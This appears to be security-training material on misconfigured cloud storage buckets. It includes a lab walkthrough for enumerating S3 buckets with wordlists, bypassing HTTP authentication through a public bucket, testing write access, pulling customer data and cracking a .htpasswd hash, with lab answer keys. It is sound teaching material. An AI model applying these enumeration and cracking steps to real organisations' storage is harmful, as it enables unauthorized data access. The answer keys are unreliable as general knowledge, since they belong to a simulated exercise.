Cloud Spotlight: Insecure Storage
Cloud storage services like AWS S3, Google Cloud buckets, and Azure Blob are crucial for cloud apps. However, they can be major security risks, exposing sensitive data and affecting companies of all sizes, including Netflix, TD Bank, Ford, Walmart, and Capital One.
Early on, cloud storage like AWS S3 was set to public access by default, which led to many data breaches as attackers found unprotected buckets. Now, cloud providers default to restricting access, requiring admins to explicitly allow public access. However, insecure storage services are still common, with sensitive data often left exposed and vulnerable.
Creating a storage bucket is similar across AWS, Google Cloud, and Azure. For AWS, you create an S3 bucket (such as falsimentis-media) in the default region. By default, public access is blocked, but the AWS admin can change this setting to allow public access.
Many storage buckets are left unprotected and public because administrators do not fully understand the risks of removing access restrictions, because access control lists (ACLs) are misused, or because buckets that start out public later accumulate sensitive data.
Cloud storage providers offer HTTP access for easy cloud app integration. Each major provider (AWS, Google Cloud, Azure) has its own access URL. For Microsoft Azure, accessing storage Blobs requires an account name and container name, which can be the same.
An attacker can find cloud storage by visiting the URL and guessing the bucket or container name. There are tools that make this process faster and easier.
AWS S3 buckets can be accessed with either the path-style URL (s3.amazonaws.com/BUCKETNAME) or the virtual-hosted-style URL (BUCKETNAME.s3.amazonaws.com). Both forms work the same way, so either can be used to view or access the bucket.
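As a rough sketch of what manual probing looks like, each provider exposes an HTTP endpoint that can be requested directly; BUCKETNAME, ACCOUNT, and CONTAINER below are placeholders, not real resources.

```bash
# Check an AWS S3 bucket name (path-style s3.amazonaws.com/BUCKETNAME also works)
curl -s -o /dev/null -w "%{http_code}\n" "https://BUCKETNAME.s3.amazonaws.com/"

# Check a Google Cloud Storage bucket name
curl -s -o /dev/null -w "%{http_code}\n" "https://storage.googleapis.com/BUCKETNAME/"

# Check an Azure Blob Storage account/container, listing its blobs if public
curl -s "https://ACCOUNT.blob.core.windows.net/CONTAINER?restype=container&comp=list"
```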
If something is unclear, check the lab solution for a detailed explanation.
Bucket Finder by Robin Wood is a tool for checking AWS S3 buckets. It uses a list of bucket names to see if they exist and whether they are public. We can also use the --download option to download all content from public buckets, but be careful: this can result in a lot of data being downloaded.
The example shows that the wordlist file has three lines. Bucket Finder will check each name from this list at the HTTP endpoint (like http://s3.amazonaws.com/microsoft) and report if the bucket exists, is denied access, or is publicly available. Users need to create their own wordlist. Bucket Finder can be downloaded from https://digi.ninja/projects/bucket_finder.php.
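As a hedged sketch of basic usage (the wordlist filename here is an assumption):

```bash
# Check each candidate name; report missing, access-denied, or public buckets
ruby bucket_finder.rb wordlist.txt

# Also download all objects from any public buckets found (can pull a lot of data)
ruby bucket_finder.rb --download wordlist.txt
```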
GCPBucketBrute scans for Google Cloud buckets and, where permitted, enumerates their permissions. Like Bucket Finder, it can take a wordlist of bucket names, and it can run with a GCP credential (or unauthenticated with -u) when checking permissions. It can also take a keyword and combine it with common suffixes to generate candidate bucket names.
In this example, GCPBucketBrute found a publicly accessible GCP bucket named falsimentis-dev with list and get permissions granted to anyone. GCPBucketBrute itself can't list or download the contents, but we can use the gsutil tool from Google for that. GCPBucketBrute, written by Spencer Gietzen of Rhino Security Labs, is available on GitHub.
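A hedged sketch of how these two tools might be combined, using the bucket name from the example above (exact GCPBucketBrute flags can vary by version):

```bash
# Enumerate permutations of a keyword without GCP credentials
python3 gcpbucketbrute.py -k falsimentis -u

# List and download objects from a public bucket with Google's gsutil
gsutil ls gs://falsimentis-dev/
gsutil cp "gs://falsimentis-dev/*" .   # copies the bucket's top-level objects (example only)
```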
Basic Blob Finder is a tool for scanning and finding Azure Blobs, similar to Bucket Finder. It takes a list of strings where each entry is either a combined account and container name, or an account name and container name separated by a colon.
Basic Blob Finder finds public Azure Blobs and lists their files. For example, it can find an account named falsimentis with a container named falsimentis-container, and list a WAV file inside. You can get it from this link.
To show the risk of unprotected buckets, consider this example: I used the top 10,000 websites and their subdomains as bucket names (e.g., microsoft.com becomes microsoft, cnn.com becomes cnn, etc.) and used a tool to search for these bucket names on Google Cloud. The scan took about 60 hours to check 1,216 possible names for each keyword.
The scan found 2,951 publicly accessible buckets, about 30% of the total. Out of these, 64 were badly misconfigured, letting anyone change bucket permissions. For example, one bucket had full permissions like setting policies, listing, getting, creating, deleting, and updating. Many unprotected buckets were easily found, and attackers could exploit these vulnerabilities further.
The (redacted) bucket can be listed, so an attacker can see and download all its files. Most public buckets only have this risk, meaning they expose information. However, this bucket also lets attackers upload files.
I used gsutil to list the files in the bucket and found hundreds of them, indicating the bucket is used by an online gambling site to share images and JavaScript. Among the files, I found JSP scripts (a server-side scripting language), including FxCodeShell.jsp, which was added in 2019.
The FxCodeShell.jsp script is a webshell that lets an attacker log in and run commands on the web server. The web server runs the script, not the cloud storage server, though it likely syncs files with the cloud.
The older date stamp in the GCP bucket shows that the attacker found a vulnerability allowing file uploads. Visiting the site using the bucket and accessing FxCodeShell.jsp returned a response of "2," indicating the server runs Linux, which is confirmed in the source code.
An attacker can use the malicious code to download and run any executable on the web server by supplying a backdoor password in the view= argument and a malicious URL in the address= argument. Without more details, it's unclear exactly how the backdoor was deployed or exploited; the attacker may have found a writable bucket with setIamPolicy access and used it to gain code execution on the server. The website with the backdoor and insecure bucket hasn't yet responded to breach reports.
Attackers can find insecure buckets by using bucket discovery tools and a wordlist for scanning. While default wordlists like Daniel Miessler's SecLists are available, discovering new buckets often requires using creative naming ideas.
For example, if an attacker is targeting a company like Falsimentis Corporation to find unprotected buckets, they would consider all possible abbreviations and variations of the company name. They would also add common prefixes and suffixes, similar to what a cloud admin might use. While tools like GCPBucketBrute can do some of this automatically, it's best for an analyst to use OSINT resources and think like a cloud admin when searching for unsecured buckets.
Defenders can use logging tools to spot hostname or URL patterns linked to cloud storage services. This can include DNS logs (for Azure Blobs and some S3 buckets), HTTP proxy logs (AWS, Azure, Google), and network packet data. Google Cloud Buckets don't have unique DNS names, so they won't appear in DNS logs.
Most cloud storage access uses TLS-encrypted HTTP traffic, but the TLS Server Name Indication (SNI) field still reveals the server name. This can help identify the cloud provider and, for providers that place the bucket name in the hostname (such as Azure Blob Storage and some S3 buckets), the bucket or container name.
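For example, a defender might extract SNI values from a packet capture with tshark along these lines (the capture filename is an assumption; field names follow current Wireshark releases):

```bash
# Pull TLS SNI hostnames from a capture and keep only cloud-storage endpoints
tshark -r traffic.pcap -T fields -e tls.handshake.extensions_server_name \
  | sort -u \
  | grep -E 's3\.amazonaws\.com|blob\.core\.windows\.net|storage\.googleapis\.com'
```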
If your organization uses cloud storage, you need to set up logging for it. Many cloud providers don’t enable this by default, so the cloud admin must specify a separate bucket for logging access. Without these logs, it’s hard to know who accessed the data and what they did with it. This is crucial for both public and access-controlled storage to understand the impact of any unauthorized access.
Cloud storage logs work with many SIEM tools and with the Elastic Stack via the Filebeat module. For a simpler approach, logs can be downloaded locally and converted to a spreadsheet format using Rob Clarke's s3logparse (https://pypi.org/project/s3-log-parse/). The example shows creating a temporary directory for S3 logs, copying logs from the sec504-erk-logging bucket, and converting them to a tab-separated values file.
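A minimal sketch of the retrieval step, assuming a local directory name; the conversion to TSV is then done with s3logparse as described in its documentation:

```bash
# Create a working directory and copy the S3 access logs locally
mkdir /tmp/s3logs
aws s3 sync s3://sec504-erk-logging/ /tmp/s3logs/
```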
In this lab, we will use the simulated cloud environment to identify and assess the threat of misconfigured cloud storage buckets.
In this lab, we will use our Slingshot Linux VM to attack a simulated AWS S3 cloud storage bucket service. We will use different techniques to identify the presence of cloud storage bucket services, then interact with these endpoints to enumerate access and retrieve sensitive data disclosed by the cloud service.
From the Slingshot Linux terminal, let's run gos3 to launch the simulated cloud environment.
Slingshot Linux has been preconfigured with simulated AWS credentials. We can find the file at ~/.aws/credentials.
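We can confirm the credentials with cat; the file uses the standard AWS credentials layout (values omitted here):

```bash
cat ~/.aws/credentials
# [default]
# aws_access_key_id = ...
# aws_secret_access_key = ...
```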
Let's see how to use the AWS command line tool aws for S3 services. It lets you work with S3 buckets much as you work with local files. With aws s3, you can create buckets (mb), list files (ls), copy files (cp), move files (mv), and more.
First, let's create a new bucket called mybucket.
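Putting the pieces together (as broken down below), the command is:

```bash
aws s3 mb s3://mybucket
```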
Let's break down the command:
aws: Run the AWS command line tool
s3: Tell the AWS command line tool to interact with S3 cloud storage bucket services
mb: Run the make bucket S3 operation
s3://mybucket: Use the S3 URI prefix s3:// with the bucket name mybucket to create the bucket
When we run the command, we get an error saying the bucket mybucket already exists. This shows that bucket names in cloud storage must be unique across all users: we can't have two buckets with the same name, even if they're owned by different people, because all S3 bucket names must be globally unique.
Let's rerun the same command and change the name to mybucket2.
We can create the bucket mybucket2 because no one else has used that name yet; the first person to create a bucket gets the name.
Next, let's upload a file to the new S3 bucket. First, let's make a text file by saving the output of ps -ef to a file named pslist.txt.
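For example:

```bash
# Save the current process list to a throwaway file for the upload test
ps -ef > pslist.txt
```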
We don't care about the file's contents; we just need a file to copy to the S3 bucket.
Next, let's copy the file from the local file system to the S3 bucket.
We added a trailing slash (/) to the destination URI, which isn't required because the copy process will add it automatically. However, it shows that the target S3 URI can be just a bucket name or a full path. For example, using s3://mybucket2/dir1/dir2/pslist.txt will make S3 create the necessary directories for us.
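The two forms described above look like this:

```bash
# Copy to the bucket root (the trailing slash is optional)
aws s3 cp pslist.txt s3://mybucket2/

# Or copy to a nested path; S3 creates the intermediate prefixes automatically
aws s3 cp pslist.txt s3://mybucket2/dir1/dir2/pslist.txt
```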
Next, let's list the bucket to see the copied file.
Next, we'll apply what we've learned to evaluate the S3 buckets used by Falsimentis Corporation.
Let's navigate to the Falsimentis website at http://www.falsimentis.com.
Let's click on the About link, find the Meet Our CEO section, and hover over the Download Company Profile button.
Notice that the link to the company profile has a different URL: http://www.falsimentis.com.s3.amazonaws.com/company-profile.pdf
Many websites use cloud storage buckets to host or distribute static files. For AWS, we can set up a bucket so that it's publicly accessible via a URL like bucketname.s3.amazonaws.com. For example, the website www.falsimentis.com is hosted on an S3 bucket at www.falsimentis.com.s3.amazonaws.com.
Since we found an S3 bucket for the Falsimentis website, we can try accessing it with the AWS command line tool.
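A listing along these lines shows what the bucket exposes:

```bash
aws s3 ls s3://www.falsimentis.com/
```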
The AWS command line tool shows that the www.falsimentis.com bucket is set to public access. This might seem obvious, since the bucket hosts the company's website (as seen with index.html and other web files). However, accessing the bucket through the S3 service can reveal additional files and access not visible from simply browsing the website.
The output shows multiple directories, including one called "protected". Let's check that directory.
When we try to access www.falsimentis.com/protected, it asks for a username and password, which means the admin is protecting this part of the web server with authentication. However, our S3 access via the AWS command line doesn't use this authentication, so we can bypass it.
Here, we see the protected directory contents, which include the .htpasswd file (storing usernames and passwords for website access) and a JSON file named sales-status.json.
We can access these files because we bypass the web server's authentication by directly accessing the public S3 bucket where the files are stored.
Next, let's use the sync command to download the contents of the protected/ directory from the S3 bucket.
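The sync looks roughly like this (the local destination directory name is an assumption):

```bash
aws s3 sync s3://www.falsimentis.com/protected/ ./protected/
```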
We have retrieved the protected files for the www.falsimentis.com web server, bypassing the HTTP authentication requirement.
In the www.falsimentis.com example, we found the S3 bucket through a PDF link on the site. Attackers can also guess bucket names to find them. In the rest of the lab, we'll use the bucket_finder tool by Robin Wood to find both public and private S3 buckets. This method also works for Azure Blob storage and Google Cloud buckets with the right discovery tools.
An attacker uses a tool to guess bucket names by trying a list of names. The tool checks if the name is a real bucket and also looks at the bucket's security.
First, let's display the contents of the ~/labs/s3/shortlist.txt file.
This file has three bucket names: mybucket (which we know exists), mybucket2 (the one we created), and sans (whose existence we're unsure of). Let's run the bucket_finder.rb script with this list of buckets as the only argument, like this.
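Assuming bucket_finder.rb is in the current directory or on the PATH, the run looks like this:

```bash
ruby bucket_finder.rb ~/labs/s3/shortlist.txt
```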
The tool correctly showed that "mybucket" and "mybucket2" exist, but "sans" does not.
Bucket_finder shows that mybucket2 gives an "access denied" error when listing its files. This is important: bucket discovery tools don't use your account's permissions to find buckets. They only check public access to see if buckets exist and try to get data from ones that are accessible.
Let's run the attack again with bucket_finder, this time using a longer list of bucket names from ~/labs/s3/bucketlist.txt, saving the results to a file called bucketlist1-output.txt using the tee command.
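That is:

```bash
ruby bucket_finder.rb ~/labs/s3/bucketlist.txt | tee bucketlist1-output.txt
```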
When using the bucket_finder tool, we might frequently see "Bucket does not exist: ...". The tool checks many buckets, so it’s easy to overlook when it finds a real bucket.
To remove the messages about unidentified buckets, let's use grep on the bucketlist1-output.txt file as shown.
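For example:

```bash
# Filter out the noise lines for buckets that were not found
grep -v "does not exist" bucketlist1-output.txt
```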
Filtering out lines that say "does not exist" gives us clearer results. We find 5 new S3 buckets: 4 are private, but the "movies" bucket is public. Using Bucket_finder, we can see the files in this public bucket, including "movies.json".
For cloud bucket discovery, an attacker can use a list of potential bucket names to find those that exist and are publicly accessible. However, this approach is not targeted, meaning the buckets found may not belong to Falsimentis Corporation. To focus on Falsimentis, we need to generate a tailored list of bucket names for more accurate results.
To make a custom list of bucket names, we'll use the company name (falsimentis) as the start and add common bucket endings to it.
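A hedged sketch of one way to build bucketlist2.txt; the suffixes.txt helper file (one common suffix per line, such as dev, prod, backup) is an assumption:

```bash
# Prepend the company name to each common suffix to build candidate bucket names
awk '{print "falsimentis-" $1}' suffixes.txt > bucketlist2.txt
```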
Let's repeat the bucket_finder attack using the bucketlist2.txt file this time.
Let's remove the messages about unidentified buckets.
We've found a new bucket, probably used by Falsimentis, called falsimentis-eng. It's also protected, so we can't access it.
Next, we'll use CeWL to create a custom wordlist by crawling a website.
Amazon S3 bucket names can only include lowercase letters, numbers, dots, or hyphens. To use a CeWL wordlist, let's convert all uppercase letters to lowercase with the tr command.
Now, let's make a custom bucket name list with CeWL suffixes using the Awk command, as shown.
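A sketch of the whole CeWL pipeline under assumed filenames (cewl-words.txt and cewl-lower.txt are names chosen here for illustration):

```bash
# Crawl the website and build a raw wordlist
cewl -w cewl-words.txt http://www.falsimentis.com

# Lowercase the words to satisfy S3 bucket-name rules
tr 'A-Z' 'a-z' < cewl-words.txt > cewl-lower.txt

# Prepend the company name to each word to produce the third candidate list
awk '{print "falsimentis-" $1}' cewl-lower.txt > bucketlist3.txt
```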
Let's repeat the bucket_finder attack again, but using the bucketlist3.txt file this time.
Let's exclude the lines that contain the string "does not exist".
With the third bucket list from CeWL, we found a new bucket called falsimentis-ai containing several images. These files are publicly available, so we can download them using the AWS command line tool or view them in Firefox using the provided URLs.
In this lab, we learned how attackers find insecure cloud storage buckets. Since each bucket name must be unique, attackers can guess names and check their access. Tools like bucket_finder and the AWS CLI make this easy. The challenge is creating a list of names to guess. Attackers can use clues from the target organization, like cloud service links or metadata, to build this list. After finding a bucket, they use the AWS CLI to check if it’s public and writable.
As defenders, we need to know these ideas to spot risky cloud storage in our own companies and create policies to protect sensitive data.
We used Awk commands to create bucket lists with "falsimentis-" as a prefix and CeWL keywords. Bucket names might have the company name and a hyphen, or they might use different separators like dots or none at all (AWS S3 buckets can use various separators).
Think about creating a new list of bucket names by combining CeWL data with prefixes, suffixes, and different separators.
1) What is the yet-undiscovered Falsimentis bucket name disclosing several images?
Let's use the bucketlist4.txt file to identify any new Falsimentis buckets.
Answer: cats-falsimentis
2) Of all the identified buckets, which ones are writable?
A cloud storage bucket might allow anyone to write to it, regardless of other settings. To check whether we can write to a bucket, first see if it exists with bucket_finder, then try copying a file to it using the AWS command line tool.
The copy fails because the bucket is not writable. We can use this approach with other buckets too. Let’s use the AWS tool to copy to the other buckets we found in this lab.
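For example, to test the website bucket using the pslist.txt file created earlier:

```bash
aws s3 cp pslist.txt s3://www.falsimentis.com/
```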
Answer: www.falsimentis.com
3) Identify one final publicly-accessible Falsimentis bucket that discloses customer data. How many customer records are disclosed in the Falsimentis customer data bucket?
We can find the final Falsimentis bucket in a few ways. The hint says it's a customer data bucket, so think of names with "cust" or "customer" in them. We can also use Awk to create a new list of bucket names by mixing prefixes and suffixes from the original bucketlist.txt.
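One hedged way to generate such combinations (the customer-related terms and the output filename are assumptions):

```bash
# Pair each existing candidate word with customer-related terms in both orders
for term in cust customer customers; do
  awk -v t="$term" '{print $1 "-" t; print t "-" $1}' ~/labs/s3/bucketlist.txt
done | sort -u > bucketlist-customers.txt
```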
Let's use the new bucket list to find the Falsimentis customer bucket.
Bucket_finder shows that the bucket contains one file called customer-pipeline-Q3.json. Let's use the AWS command line tool to get the file.
The customer-pipeline-Q3.json file contains a list of JSON records, all formatted as a single line of text.
JSON files are often stored on a single line because JSON doesn't require line breaks. Using cat will show the data as one long line, making it hard to read. Instead, we can use jq to view and understand the data structure more easily.
By using jq to check the data format, we find that the JSON file is a list of customer records. With jq, we can count how many records are in the list using the length function.
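For example:

```bash
# Pretty-print the JSON structure, then count the records in the top-level list
jq . customer-pipeline-Q3.json
jq 'length' customer-pipeline-Q3.json
```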
Answer: 421
4) We found that the /protected folder on the www.falsimentis.com site revealed a JSON file and a .htpasswd file. The .htpasswd file contains a password hash used to control access to the /protected section of the website.
What is the username and plaintext password that grants access to www.falsimentis.com/protected?
Let's examine the password hash information using cat.
The username is lwatsham, followed by a password hash. The dollar sign separates the parts of the hash, like in a Linux /etc/shadow file. Here, apr1 is the hash type, KYxkC7nP is the salt, and EcuHm3.iStKpM6P8ix0DN1 is the password hash.
The apr1 identifier is used in Apache HTTP authentication (.htpasswd) files. It uses MD5 with 1,000 iterations to make password cracking harder.
Let's use the --identify option to find out the Hashcat mode for Apache apr1 authentication hashes.
When using Hashcat, make sure the hash is on its own line, including hash type and salt. If we run Hashcat with the .htpasswd file as it is, we'll get an error.
The "no hash-mode matches" error happens because the username comes before the password hash. Let's use the --username option in Hashcat to indicate that the username precedes the password hash.
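A hedged sketch of the workflow (mode 1600 is Hashcat's Apache apr1 MD5 mode; the wordlist path is an assumption):

```bash
# Identify the hash mode using just the hash portion (strip the username field)
cut -d: -f2 .htpasswd > hash-only.txt
hashcat --identify hash-only.txt

# Crack the original file, telling Hashcat a username precedes each hash
hashcat -m 1600 --username .htpasswd /usr/share/wordlists/rockyou.txt
```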
Answer: hoera1991